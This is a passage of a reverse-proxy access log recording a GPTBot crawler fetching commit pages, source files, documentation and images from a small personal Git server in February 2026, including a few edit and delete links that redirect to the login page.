like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.log" +[17/Feb/2026:15:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor_KRX.py" [Client 74.7.227.38] [Length 32045] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" +[17/Feb/2026:15:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fnos_setup.exe" [Client 74.7.227.38] [Length 23797] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/nos_setup.exe" +[17/Feb/2026:15:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 19724] [Gzip 7.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:15:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 34905] [Gzip 9.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" +[17/Feb/2026:15:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9944] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 12771] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/QUICKSTART.md" +[17/Feb/2026:15:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py?display=source" [Client 74.7.227.38] [Length 21550] [Gzip 6.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" +[17/Feb/2026:15:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico?display=rendered" [Client 74.7.227.38] [Length 10854] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.TemporaryDocument/assetpilot.ico" +[17/Feb/2026:15:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=PythonTest%2fREADME.md" [Client 74.7.227.38] [Length 24605] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/README.md" +[17/Feb/2026:15:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 11077] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images" +[17/Feb/2026:15:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 10323] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 46477] [Gzip 15.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 10466] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 23217] [Gzip 11.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 135429] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" [Client 74.7.227.38] [Length 68328] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/docker-compose.yml" +[17/Feb/2026:15:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10841] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" +[17/Feb/2026:15:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/index.html" +[17/Feb/2026:15:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:15:40:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" +[17/Feb/2026:15:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/instrument.png" +[17/Feb/2026:15:40:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" +[17/Feb/2026:15:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/instrument.png" +[17/Feb/2026:15:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2ffallback_http_error.log" [Client 74.7.227.38] [Length 26834] [Gzip 7.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:15:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=npm%2fdata%2flogs%2ffallback_http_access.log" [Client 74.7.227.38] [Length 38008] [Gzip 10.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:15:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" +[17/Feb/2026:15:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/instrument.png" [Client 74.7.227.38] [Length 944] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/instrument.png" +[17/Feb/2026:15:40:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10892] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" +[17/Feb/2026:15:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html?display=source" [Client 74.7.227.38] [Length 32429] [Gzip 9.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +[17/Feb/2026:15:40:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fREADME.md" [Client 74.7.227.38] [Length 31787] [Gzip 7.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/README.md" +[17/Feb/2026:15:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx?display=source" [Client 74.7.227.38] [Length 14671] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" +[17/Feb/2026:15:40:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" +[17/Feb/2026:15:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" +[17/Feb/2026:15:40:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16487] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" +[17/Feb/2026:15:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10917] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" +[17/Feb/2026:15:40:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14830] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" +[17/Feb/2026:15:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14213] [Gzip 4.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" +[17/Feb/2026:15:40:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10913] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" +[17/Feb/2026:15:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13942] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" +[17/Feb/2026:15:40:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx?display=source" [Client 74.7.227.38] [Length 13892] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Hero.tsx" +[17/Feb/2026:15:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" +[17/Feb/2026:15:40:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" +[17/Feb/2026:15:40:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10915] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" +[17/Feb/2026:15:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html?display=source" [Client 74.7.227.38] [Length 22664] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" +[17/Feb/2026:15:40:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html?display=source" [Client 74.7.227.38] [Length 32605] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" +[17/Feb/2026:15:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10848] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/index.html" +[17/Feb/2026:15:40:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10885] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" +[17/Feb/2026:15:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md?display=rendered" [Client 74.7.227.38] [Length 14319] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md" +[17/Feb/2026:15:40:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md?display=rendered" [Client 74.7.227.38] [Length 15812] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:15:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 74.7.227.38] [Length 20908] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/MIGRATION_GUIDE.md" +[17/Feb/2026:15:40:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument/DOCKER_QUICKSTART.md?display=source" [Client 74.7.227.38] [Length 